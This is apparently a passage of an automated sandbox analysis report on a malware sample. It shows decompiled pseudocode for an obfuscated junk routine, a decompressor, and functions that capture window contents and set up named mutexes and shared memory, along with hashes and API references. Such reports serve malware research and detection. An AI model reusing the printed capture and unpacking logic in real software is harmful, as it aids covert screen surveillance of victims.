				_t243 = _t242 + _t253;
				 *_t205 =  *_t205 + _t224;
				_t233 = _t232 + _t253;
				 *_t224 =  *_t224 + _t96;
				 *0x1901ea01 =  *0x1901ea01 + _t187;
				_t254 = _t253 + _t243;
				 *_t169 =  *_t169 + _t169;
				_t225 = _t224 + _t243;
				 *_t225 =  *_t225 + _t187;
				_t98 = _t96 + _t243 + _t233;
				 *_t187 =  *_t187 + _t205;
				_t188 = _t187 + _t233;
				 *((intOrPtr*)(_t188 + _t98 - 0xe)) =  *((intOrPtr*)(_t188 + _t98 - 0xe)) + _t98;
				 *((intOrPtr*)(_t98 + 1)) =  *((intOrPtr*)(_t98 + 1)) + _t188;
				asm("cmc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t205;
				asm("clc");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t169;
				asm("stc");
				 *((intOrPtr*)(_t225 + 1)) =  *((intOrPtr*)(_t225 + 1)) + _t243;
				asm("sti");
				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t233;
				 *_t188 =  *_t188 + 1;
				asm("arpl [ecx], ax");
				 *_t188 =  *_t188 + 1;
				_t100 =  *0xa6012602 +  *((intOrPtr*)(_t188 +  *0xa6012602));
				_t170 = _t169 +  *_t233;
				 *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) =  *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) + _t243;
				asm("daa");
				 *((intOrPtr*)(_t233 - 0x46fedafe)) =  *((intOrPtr*)(_t233 - 0x46fedafe)) + _t233;
				 *((intOrPtr*)(_t170 - 0x43fee0fe)) =  *((intOrPtr*)(_t170 - 0x43fee0fe)) + _t225;
				_t189 = _t188 +  *_t100;
				_t102 = _t100 +  *_t100 + _t170;
				_t171 = _t170 +  *((intOrPtr*)(_t189 + _t102));
				asm("insb");
				_t172 = _t171 +  *((intOrPtr*)(_t189 + _t102 - 0x1b));
				_t236 = _t233 + _t100 + _t171 + _t254;
				_t191 = _t189 +  *_t172 +  *((intOrPtr*)(_t189 +  *_t172));
				_t245 = _t243 + _t205 +  *_t188 +  *0xa02c501 + _t236;
				_t104 = _t102 +  *_t191 + _t225;
				_t237 = _t236 + _t225;
				 *0xa3013803 = _t104;
				asm("movsd");
				_t246 = _t245 +  *_t104;
				 *((intOrPtr*)(_t237 - 0x55fec4fd)) =  *((intOrPtr*)(_t237 - 0x55fec4fd)) + _t254;
				 *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) =  *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) + _t246;
				_push(_t225);
				 *((intOrPtr*)(_t246 - 0x49fed6fd)) =  *((intOrPtr*)(_t246 - 0x49fed6fd)) + _t237;
				_t226 = _t225 +  *((intOrPtr*)(_t191 + _t104));
				 *((intOrPtr*)(3 + _t104 + 0x3bd0167)) =  *((intOrPtr*)(3 + _t104 + 0x3bd0167)) + _t226;
				 *((intOrPtr*)(_t226 - 0x3ffeb4fd)) =  *((intOrPtr*)(_t226 - 0x3ffeb4fd)) + _t226;
				asm("rol byte [ebx], cl");
				_t239 = _t237 +  *_t237 +  *0xFFFFFFFFBB011304;
				_push(0x6a03de01);
				_t229 = _t226 + _t104 +  *_t104 + _t191 + _t254 +  *((intOrPtr*)(_t237 + 1)) +  *3 + _t191 - 1;
				_t249 = _t246 +  *_t237 +  *0xbb011303 +  *_t229;
				_t213 = 0xffffffffbb011302 +  *_t237 +  *_t229;
				_t230 = _t229 + _t249;
				asm("repne add ecx, [ebp+0x1]");
				asm("repe add esi, [edi]");
				_t195 = _t191 + 0xffffffff76022609 + _t239 + _t230;
				asm("std");
				_t251 = _t249 +  *((intOrPtr*)(0xffffffffbb011306)) +  *((intOrPtr*)(_t195 + 1));
				 *((char*)(0xffffffffbb011306)) =  *((char*)(0xffffffffbb011306)) + 1;
				_t111 = 0x3e +  *_t195 * 0x7e;
				 *(_t195 - 0x5dcffdfc) =  *(_t195 - 0x5dcffdfc) & _t111;
				_t112 = _t111 + 0xc;
				 *0xFFFFFFFF5F31200A =  *0xFFFFFFFF5F31200A ^ _t112;
				_t113 = _t112 + 1;
				 *(_t251 - 0x59cf04fc) =  *(_t251 - 0x59cf04fc) ^ _t113;
				_t114 = _t113 + 0xf2;
				 *(_t230 - 0x57cf5efc) =  *(_t230 - 0x57cf5efc) ^ _t114;
				 *(_t195 - 0x55cf5afc) =  *(_t195 - 0x55cf5afc) ^ _t195;
				 *0xFFFFFFFF6731BC0A =  *0xFFFFFFFF6731BC0A ^ _t195;
				 *(_t251 - 0x51cf1afc) =  *(_t251 - 0x51cf1afc) ^ _t195;
				 *(_t230 - 0x4fcf3cfc) =  *(_t230 - 0x4fcf3cfc) ^ _t195;
				 *(_t195 - 0x4dcf5dfc) =  *(_t195 - 0x4dcf5dfc) ^ _t213;
				 *0xFFFFFFFF6F31B90A =  *0xFFFFFFFF6F31B90A ^ _t213;
				 *(_t251 - 0x49cf55fc) =  *(_t251 - 0x49cf55fc) ^ _t213;
				 *(_t230 - 0x47cf52fc) =  *(_t230 - 0x47cf52fc) ^ _t213;
				 *(_t195 - 0x45cf4efc) =  *(_t195 - 0x45cf4efc) ^ 0xffffffffbb011306;
				 *0xFFFFFFFF7731C80A =  *0xFFFFFFFF7731C80A ^ 0xffffffffbb011306;
				 *(_t251 - 0x41cf46fc) =  *(_t251 - 0x41cf46fc) ^ 0xffffffffbb011306;
				 *(_t230 - 0x3fcf42fc) =  *(_t230 - 0x3fcf42fc) ^ 0xffffffffbb011306;
				_t127 = _t114 + 0x99a;
				_t128 = _t127 + 0xc1;
				_t132 = (_t128 + 0x18a ^ _t128 + 0x18a) + 0xc8;
				_t133 = _t132 + 0xca;
				_t217 = _t213 ^ _t128 ^ _t133 ^ 0;
				_t165 = ((((((_t133 + 0x197 ^ _t195 ^ _t127 ^ _t132) + 0x33c ^ 0) + 0x366 ^ _t217) + 0x382 ^ 0) + 0x39b ^ 0x00000003) + 0x3ae ^ 0) + 0x319;
				 *(_t251 + _t165 + 0x5bb060c) =  *(_t251 + _t165 + 0x5bb060c) ^ 0 ^ _t217 ^ 3;
				asm("sbb eax, [esi]");
				return _t165 + 0x05c20621 &  *(_t239 +  *0xFFFFFFFFBB011307);
			}

0x004021f3
0x004021f3
0x004021f3
0x004021f5
0x004021f7
0x004021f9
0x004021fd
0x004021ff
0x00402201
0x00402205
0x00402208
0x0040220a
0x0040220b
0x0040220d
0x00402212
0x00402213
0x00402215
0x00402215
0x00402218
0x0040221a
0x0040221c
0x0040221c
0x0040221d
0x00402220
0x00402222
0x00402223
0x00402225
0x00402227
0x00402229
0x0040222b
0x0040222d
0x00402231
0x00402237
0x00402239
0x0040223b
0x0040223d
0x0040223f
0x00402241
0x00402243
0x00402245
0x00402249
0x0040224c
0x0040224d
0x00402250
0x00402251
0x00402254
0x00402255
0x00402258
0x00402259
0x0040225c
0x0040225e
0x00402260
0x00402269
0x00402271
0x00402273
0x0040227a
0x0040227b
0x00402283
0x00402291
0x00402297
0x00402299
0x0040229e
0x004022a1
0x004022a7
0x004022a9
0x004022ab
0x004022af
0x004022b7
0x004022bc
0x004022c4
0x004022c5
0x004022c7
0x004022cf
0x004022da
0x004022db
0x004022e1
0x004022eb
0x004022f3
0x0040230c
0x00402315
0x0040231a
0x00402323
0x00402325
0x00402329
0x0040232b
0x00402334
0x00402338
0x0040233b
0x00402340
0x00402341
0x00402344
0x00402349
0x0040234b
0x00402351
0x00402353
0x00402359
0x0040235b
0x00402361
0x00402363
0x0040236b
0x00402373
0x0040237b
0x00402383
0x0040238b
0x00402393
0x0040239b
0x004023a3
0x004023ab
0x004023b3
0x004023bb
0x004023c3
0x004023c9
0x004023cd
0x004023d9
0x004023dd
0x004023ff
0x00402445
0x00402447
0x0040244e
0x0040245c

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction ID: 97992bde24c046a6897ea3d3d74e00cd9fd59e8f3269b1bc45476090c5f7383c
Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction Fuzzy Hash: FF81C5319893918BC795DF38C8D55D6BBB1EE4322432D85DDC8940EA03E22F651BDF51

Uniqueness

Uniqueness Score: -1.00%

Function 00419174, Relevance: .2, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00419174(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				unsigned int _t67;
				signed int _t68;
				intOrPtr _t71;
				void* _t79;
				signed int _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				unsigned int _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr* _t119;
				unsigned int _t125;
				signed int _t126;
				signed int _t128;

				_t71 = _a4;
				_t98 = 0;
				_t99 = 0;
				_v16 = 0;
				_v20 = 1;
				L1:
				while(1) {
					if(_t99 == 0) {
						_t103 =  *(_t98 + _t71);
						_t98 = _t98 + 4;
						_t99 = 0x1f;
						_t104 = _t103 >> 0x1f;
					} else {
						_t99 = _t99 - 1;
						_t104 = _t67 >> _t99 & 0x00000001;
					}
					if(_t104 != 0) {
						_v16 = _v16 + 1;
						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
						_t98 = _t98 + 1;
						L6:
						_t71 = _a4;
						continue;
					}
					_v12 = 1;
					do {
						if(_t99 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t100 = 0x1f;
							_t106 = _t67 >> 0x1f;
						} else {
							_t100 = _t99 - 1;
							_t106 = _t67 >> _t100 & 0x00000001;
						}
						_v12 = _t106 + _v12 * 2;
						if(_t100 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t108 = _t67 >> 0x1f;
						} else {
							_t99 = _t100 - 1;
							_t108 = _t67 >> _t99 & 0x00000001;
						}
					} while (_t108 == 0);
					_t111 = _v12;
					if(_t111 == 2) {
						_t81 = _v20;
						L19:
						_v12 = _t81;
						if(_t99 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t101 = 0x1f;
							_v8 = _t67 >> 0x1f;
						} else {
							_t101 = _t99 - 1;
							_v8 = _t67 >> _t101 & 0x00000001;
						}
						if(_t101 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t115 = _t67 >> 0x1f;
						} else {
							_t99 = _t101 - 1;
							_t115 = _t67 >> _t99 & 0x00000001;
						}
						_t116 = _t115 + _v8 * 2;
						_v8 = _t116;
						if(_t116 == 0) {
							_v8 = 1;
							do {
								if(_t99 == 0) {
									_t125 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t102 = 0x1f;
									_t126 = _t125 >> 0x1f;
								} else {
									_t102 = _t99 - 1;
									_t126 = _t67 >> _t102 & 0x00000001;
								}
								_v8 = _t126 + _v8 * 2;
								if(_t102 == 0) {
									_t67 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t99 = 0x1f;
									_t128 = _t67 >> 0x1f;
								} else {
									_t99 = _t102 - 1;
									_t128 = _t67 >> _t99 & 0x00000001;
								}
							} while (_t128 == 0);
							_v8 = _v8 + 2;
						}
						asm("sbb ecx, ecx");
						_v8 = _v8 +  ~0xd00;
						_t87 = _v16;
						_t119 = _t87 - _v12 + _a12;
						_v16 = _t119;
						 *((char*)(_t87 + _a12)) =  *_t119;
						_t88 = _t87 + 1;
						_v16 = _v16 + 1;
						do {
							 *((char*)(_t88 + _a12)) =  *_v16;
							_t88 = _t88 + 1;
							_v16 = _v16 + 1;
							_t57 =  &_v8;
							 *_t57 = _v8 - 1;
						} while ( *_t57 != 0);
						_v16 = _t88;
						goto L6;
					}
					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
					_t98 = _t98 + 1;
					if(_t79 != 0xffffffff) {
						_t81 = _t79 + 1;
						_v20 = _t81;
						goto L19;
					}
					_t68 = _a16;
					 *_t68 = _v16;
					return _t68 & 0xffffff00 | _t98 == _a8;
				}
			}

0x0041917b
0x0041917f
0x00419184
0x00419186
0x00419189
0x00000000
0x00419190
0x00419192
0x004191a5
0x004191a7
0x004191aa
0x004191ab
0x00419194
0x00419194
0x0041919b
0x0041919b
0x004191b0
0x004191bb
0x004191be
0x004191c1
0x004191c2
0x004191c2
0x00000000
0x004191c2
0x004191c7
0x004191ce
0x004191d0
0x004191de
0x004191e5
0x004191e8
0x004191e9
0x004191d2
0x004191d2
0x004191d9
0x004191d9
0x004191f2
0x004191f7
0x00419205
0x0041920c
0x0041920f
0x00419210
0x004191f9
0x004191f9
0x00419200
0x00419200
0x00419213
0x00419217
0x0041921d
0x0041921f
0x0041923e
0x0041923e
0x00419243
0x00419254
0x00419259
0x00419261
0x00419262
0x00419245
0x00419245
0x0041924f
0x0041924f
0x00419267
0x00419275
0x0041927c
0x0041927f
0x00419280
0x00419269
0x00419269
0x00419270
0x00419270
0x00419286
0x00419289
0x0041928e
0x00419290
0x00419297
0x00419299
0x004192ac
0x004192ae
0x004192b1
0x004192b2
0x0041929b
0x0041929b
0x004192a2
0x004192a2
0x004192bb
0x004192c0
0x004192ce
0x004192d5
0x004192d8
0x004192d9
0x004192c2
0x004192c2
0x004192c9
0x004192c9
0x004192dc
0x004192e0
0x004192e0
0x004192ec
0x004192f0
0x004192f3
0x004192fb
0x00419300
0x00419306
0x00419309
0x0041930a
0x0041930d
0x00419315
0x00419318
0x00419319
0x0041931c
0x0041931c
0x0041931c
0x00419321
0x00000000
0x00419321
0x0041922e
0x00419230
0x00419234
0x0041923a
0x0041923b
0x00000000
0x0041923b
0x00419329
0x00419334
0x0041933b
0x0041933b

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
Instruction ID: cb237f5ecbc09ba7299954b414e386d201469e072867a5b5cab95661d43336dc
Opcode Fuzzy Hash: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
Instruction Fuzzy Hash: 4651C532E04525ABDB14CE58C4606EDF7B1EF85324F1A46EACD16BF385C674AD81C784

Uniqueness

Uniqueness Score: -1.00%

Function 00406015, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction ID: eea1792e0e415849e641d85ba5d0de20d1c706b6ef45094b714dd468c90f76d1
Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction Fuzzy Hash: 4AE0267A7800128BC711CE15D880943BBB6FBD8330B1382B6C8168734AC938EDC3C5D5

Uniqueness

Uniqueness Score: -1.00%

Function 00408D10, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00408D10(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
				char _v9;
				signed int _v10;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* _v68;
				signed int _v72;
				int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				struct HDC__* _v96;
				struct HWND__* _v100;
				void _v104;
				intOrPtr _v140;
				intOrPtr _v156;
				struct tagWINDOWINFO _v164;
				signed int _t128;
				signed int _t135;
				void* _t140;
				void* _t146;
				signed int _t164;
				intOrPtr _t191;
				long _t192;
				intOrPtr _t195;
				long _t196;
				long _t210;
				long _t211;
				long _t212;
				long _t213;
				signed int _t214;
				signed int _t215;
				RECT* _t216;
				struct HDC__* _t217;
				struct HDC__* _t221;

				_t214 = __edx;
				_t216 = __eax;
				_t128 = E00408037(_a8) & 0x0000ffff;
				_v16 = _t128;
				if((_t128 & 0x00000001) == 0) {
					if(_t128 == 0) {
						_v16 = 2;
						_t128 = _v16;
					}
					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
						_v16 = _t128 & 0x0000fffd | 0x00000008;
					}
					_v24 = 0;
					_v20 = 0;
					_v28 = 0;
					_v32 = 0;
					_v164.cbSize = 0x3c;
					if(GetWindowInfo(_a8,  &_v164) != 0) {
						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
						_v10 = _t215;
						if(_t215 != 0) {
							_t212 = _t216->top;
							_t195 = _v156;
							if(_t195 < _t212) {
								_v20 = _t195 - _t212;
							}
							_t213 = _t216->left;
							_t196 = _v164.rcWindow.left;
							if(_t196 < _t213) {
								_v24 = _t196 - _t213;
							}
						}
						_t135 = _v16 & 0x00000002;
						_v72 = _t135;
						if(_t135 == 0) {
							_a15 = _t215;
						} else {
							if((_v164.dwStyle & 0x20000000) == 0) {
								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
								if(_a15 != 0) {
									_t210 = _t216->top;
									_t191 = _v140;
									if(_t191 < _t210) {
										_v32 = _t191 - _t210;
									}
									_t211 = _t216->left;
									_t192 = _v164.rcClient.left;
									if(_t192 < _t211) {
										_v28 = _t192 - _t211;
									}
								}
							} else {
								_a15 = 0;
							}
						}
						if(_v10 != 0 || _a15 != 0) {
							_t217 = GetDC(0);
							if(_t217 == 0) {
								goto L8;
							}
							_t221 = CreateCompatibleDC(_t217);
							ReleaseDC(0, _t217);
							if(_t221 == 0) {
								goto L8;
							}
							_t218 = _a4;
							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
							_v68 = _t140;
							if(_t140 != 0) {
								_v9 = 1;
								if(_v72 == 0) {
									if((_v16 & 0x00000004) == 0) {
										if((_v16 & 0x00000008) == 0) {
											L56:
											SelectObject(_t221, _v68);
											DeleteDC(_t221);
											return _v9;
										}
										if(_v24 != 0 || _v20 != 0) {
											SetViewportOrgEx(_t221, _v24, _v20, 0);
										}
										_t146 = E00408C2E(_t218,  &_v64, 0);
										__imp__PrintWindow(_a8, _t221, 0);
										if(_t146 != 0) {
											L55:
											E00408C2E(_t218,  &_v64, 1);
										} else {
											_v9 = 0;
										}
										goto L56;
									}
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E00408C2E(_t218,  &_v64, 0);
									DefWindowProcW(_a8, 0x317, _t221, 0xe);
									goto L55;
								}
								_v100 = _a8;
								_v96 = _t221;
								_v84 = _v48.right - _v48.left;
								_v76 = 1;
								_v80 = _v48.bottom - _v48.top;
								_v92 = 0;
								_v88 = 0;
								TlsSetValue( *0x422e14,  &_v104);
								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
									_v16 = SaveDC(_t221);
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E00408C2E(_a4,  &_v64, 0);
									_v104 = 0;
									SendMessageW(_a8, 0x85, 1, 0);
									if(_v104 == 0) {
										DefWindowProcW(_a8, 0x317, _t221, 2);
									}
									E00408C2E(_a4,  &_v64, 1);
									RestoreDC(_t221, _v16);
								}
								if(_a15 != 1) {
									L49:
									TlsSetValue( *0x422e14, 0);
									goto L56;
								} else {
									if(_v28 != 0) {
										L41:
										_a15 = 1;
										L42:
										_v16 = SaveDC(_t221);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										E00408C2E(_a4,  &_v48, 0);
										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
										asm("sbb eax, eax");
										_v76 =  ~_t164 + 1;
										RestoreDC(_t221, _v16);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										_v104 = 0;
										SendMessageW(_a8, 0xf, 0, 0);
										if(_v104 == 0) {
											DefWindowProcW(_a8, 0x317, _t221, 4);
										}
										E00408C2E(_a4,  &_v48, 1);
										goto L49;
									}
									_a15 = 0;
									if(_v32 == 0) {
										goto L42;
									}
									goto L41;
								}
							}
							DeleteDC(_t221);
							goto L8;
						} else {
							goto L1;
						}
					}
					L8:
					return 0;
				}
				L1:
				return 1;
			}

0x00408d10
0x00408d1f
0x00408d26
0x00408d29
0x00408d2e
0x00408d3c
0x00408d3e
0x00408d45
0x00408d45
0x00408d4b
0x00408d59
0x00408d59
0x00408d66
0x00408d69
0x00408d6c
0x00408d6f
0x00408d72
0x00408d84
0x00408da3
0x00408da6
0x00408dab
0x00408dad
0x00408db0
0x00408db8
0x00408dbc
0x00408dbc
0x00408dbf
0x00408dc1
0x00408dc9
0x00408dcd
0x00408dcd
0x00408dc9
0x00408dd3
0x00408dd6
0x00408dd9
0x00408e27
0x00408ddb
0x00408de2
0x00408df9
0x00408e00
0x00408e02
0x00408e05
0x00408e0d
0x00408e11
0x00408e11
0x00408e14
0x00408e16
0x00408e1e
0x00408e22
0x00408e22
0x00408e1e
0x00408de4
0x00408de4
0x00408de4
0x00408de2
0x00408e2d
0x00408e3f
0x00408e43
0x00000000
0x00000000
0x00408e52
0x00408e54
0x00408e5c
0x00000000
0x00000000
0x00408e62
0x00408e69
0x00408e6f
0x00408e74
0x00408e82
0x00408e8a
0x00409005
0x00409066
0x00409047
0x0040904b
0x00409052
0x00000000
0x00409058
0x0040906b
0x0040907a
0x0040907a
0x00409086
0x00409090
0x00409098
0x0040903b
0x00409042
0x0040909a
0x0040909a
0x0040909a
0x00000000
0x00409098
0x0040900a
0x00409019
0x00409019
0x00409025
0x00409035
0x00000000
0x00409035
0x00408e93
0x00408e9c
0x00408e9f
0x00408ea8
0x00408eaf
0x00408ebc
0x00408ebf
0x00408ec2
0x00408ed2
0x00408eed
0x00408ef3
0x00408f02
0x00408f02
0x00408f0f
0x00408f1f
0x00408f22
0x00408f27
0x00408f34
0x00408f34
0x00408f42
0x00408f4b
0x00408f4b
0x00408f55
0x00408ff2
0x00408ff9
0x00000000
0x00408f5b
0x00408f5e
0x00408f68
0x00408f68
0x00408f6c
0x00408f73
0x00408f79
0x00408f83
0x00408f83
0x00408f90
0x00408f9c
0x00408fa3
0x00408fa7
0x00408faa
0x00408fb3
0x00408fbd
0x00408fbd
0x00408fca
0x00408fcd
0x00408fd2
0x00408fdf
0x00408fdf
0x00408fed
0x00000000
0x00408fed
0x00408f60
0x00408f66
0x00000000
0x00000000
0x00000000
0x00408f66
0x00408f55
0x00408e77
0x00000000
0x00000000
0x00000000
0x00000000
0x00408e2d
0x00408d86
0x00000000
0x00408d86
0x00408d30
0x00000000

APIs

Part of subcall function 00408037: GetClassNameW.USER32 ref: 00408052

GetWindowInfo.USER32 ref: 00408D7C
SelectObject.GDI32(00000000,?), ref: 0040904B
DeleteDC.GDI32(00000000), ref: 00409052
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0040907A
PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 00409090

Strings

<, xrefs: 00408D72

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
String ID: <
API String ID: 3458064076-4251816714
Opcode ID: 18856e341b86337cee409d4b2db5e82424cd26005bd9a545d6c038b0bd56d663
Instruction ID: 8971ae914542768936780ac019e5349d321b65d31754214ac9f8e8e5c9fbefc5
Opcode Fuzzy Hash: 18856e341b86337cee409d4b2db5e82424cd26005bd9a545d6c038b0bd56d663
Instruction Fuzzy Hash: 13C16F71D01249EFDF119FA4CE44AEEBBB9AF04300F04813AF955B62A1DB388E45DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040809E, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 205
filewindowregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040809E(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
				char _v5;
				struct HDC__* _v12;
				char _v16;
				short _v124;
				void* _v134;
				char _v612;
				char _v1522;
				char _v1636;
				void* _t60;
				long _t62;
				void* _t66;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t80;
				struct HDC__* _t82;
				int _t85;
				void* _t87;
				signed char _t90;
				void* _t92;
				void* _t107;
				struct HDC__* _t108;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t120;
				void** _t124;

				_t124 = __esi;
				_t120 = __edx;
				E004164D4(_t60, __esi, 0, 0x18c);
				_t62 = TlsAlloc();
				__esi[1] = _t62;
				if(_t62 != 0xffffffff) {
					E00406762(0x84889911,  &_v124, 0);
					_t66 = RegisterWindowMessageW( &_v124);
					__esi[2] = _t66;
					__eflags = _t66;
					if(_t66 == 0) {
						goto L1;
					}
					E00406762(0x84889912,  &_v124, 1);
					_t71 = CreateEventW(0x422978, 1, 0,  &_v124);
					__esi[3] = _t71;
					__eflags = _t71;
					if(_t71 == 0) {
						goto L1;
					}
					E00406762(0x18782822,  &_v124, 1);
					_t75 = CreateMutexW(0x422978, 0,  &_v124);
					__esi[5] = _t75;
					__eflags = _t75;
					if(_t75 == 0) {
						goto L1;
					}
					E00406762(0x9878a222,  &_v124, 1);
					_t79 = CreateFileMappingW(0, 0x422978, 4, 0, 0x3d09128,  &_v124);
					 *__esi = _t79;
					__eflags = _t79;
					if(_t79 == 0) {
						goto L1;
					}
					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
					__eflags = _t80;
					if(_t80 == 0) {
						goto L1;
					}
					__esi[4] = _t80;
					__esi[6] = _t80 + 0x128;
					_v5 = 0;
					_t82 = GetDC(0);
					_v12 = _t82;
					__eflags = _t82;
					if(_t82 == 0) {
						L22:
						return _v5;
					}
					__esi[9] = 0;
					__esi[0xa] = 0;
					__esi[0xb] = GetDeviceCaps(_t82, 8);
					_t85 = GetDeviceCaps(_v12, 0xa);
					_t21 =  &(_t124[0xb]); // 0x0
					_t118 =  *_t21;
					__esi[0xc] = _t85;
					__eflags = CreateCompatibleBitmap(_v12,  *_t21, _t85);
					if(__eflags == 0) {
						_t87 = 0;
						__eflags = 0;
					} else {
						_t24 =  &(_t124[8]); // 0x422e30
						_t87 = E0041C9CD(_t118, _t120, __eflags, _v12,  &_v16, _t24, 0, 0, _t86);
					}
					_t124[7] = _t87;
					ReleaseDC(0, _v12);
					__eflags = _t124[7];
					if(_t124[7] != 0) {
						_t119 = _v16;
						_t90 =  *(_v16 + 0xe) >> 3;
						_t124[0xe] = _t90;
						_t33 =  &(_t124[0xb]); // 0x0
						_t92 = (_t90 & 0x000000ff) *  *_t33;
						_t124[0xd] = _t92;
						__eflags = _t92 & 0x00000003;
						if((_t92 & 0x00000003) != 0) {
							_t92 = (_t92 & 0xfffffffc) + 4;
							__eflags = _t92;
						}
						_t124[0xd] = _t92;
						E00416421(_t119);
						__eflags = _a4 - 1;
						_v5 = 1;
						if(_a4 != 1) {
							goto L22;
						}
						_v5 = 0;
						E00406A39( &_v1636);
						E00406A66(_t119,  &_v612);
						_t43 =  &(_t124[0xf]); // 0x422e4c
						E0041645D(_t43, 0x422bb8, 0x10);
						_t124[0x13] = _v134;
						_t47 =  &(_t124[0x14]); // 0x422e60
						E0041645D(_t47,  &_v1522, 0x102);
						E00406762(0x1898b122,  &_v124, 1);
						_t107 = CreateMutexW(0x422978, 0,  &_v124);
						_t124[0x58] = _t107;
						__eflags = _t107;
						if(_t107 == 0) {
							goto L1;
						}
						_t108 = GetDC(0);
						_a4 = _t108;
						__eflags = _t108;
						if(_t108 != 0) {
							_t109 = CreateCompatibleDC(_t108);
							_t124[0x55] = _t109;
							__eflags = _t109;
							if(_t109 != 0) {
								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
								_t124[0x57] = _t111;
								__eflags = _t111;
								if(_t111 != 0) {
									_t55 =  &(_t124[0x55]); // 0x0
									_t112 = SelectObject( *_t55, _t111);
									_t124[0x56] = _t112;
